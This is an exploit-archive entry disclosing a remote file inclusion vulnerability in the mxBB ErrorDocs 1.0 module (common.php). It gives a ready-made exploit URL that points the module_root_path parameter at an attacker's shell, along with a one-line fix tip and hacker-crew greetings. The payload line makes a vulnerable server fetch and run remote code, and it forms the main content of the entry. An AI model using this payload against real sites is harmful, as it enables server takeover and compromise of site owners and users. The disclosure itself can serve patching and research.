id: 1251
date: 12/11/2006
title: mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability
author: bd0rk
cves: 

=====================================================================
mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability
=====================================================================



=> mxBB Module mx_errordocs 1.0 Remote File Include Vulnerability

=> Bugfounder: bd0rk || SOH-Crew

=> Vulnerable code in common.php

=> Greetings: str0ke, broken-error, Martn & m0rphin

[+] Exploit: http://[target]/[patH]/includes/common.php?module_root_path=YouRSheLL?

=> Special Fixtip: Declare $module_root_path or use Hacking Attempt



#  0day.today [2023-03-25]  #